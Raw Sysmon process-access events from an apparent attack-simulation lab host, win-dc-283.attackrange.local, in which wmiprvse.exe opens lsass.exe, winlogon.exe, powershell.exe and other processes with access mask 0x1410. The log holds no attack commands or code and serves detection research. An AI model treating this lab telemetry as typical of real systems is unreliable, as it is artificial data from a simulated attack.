15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026278Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026277Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026539Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026538Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026537Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026536Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026535Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026534Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026533Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026532Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026531Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026530Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026529Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026528Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026527Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026526Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026525Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026524Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026523Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026522Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 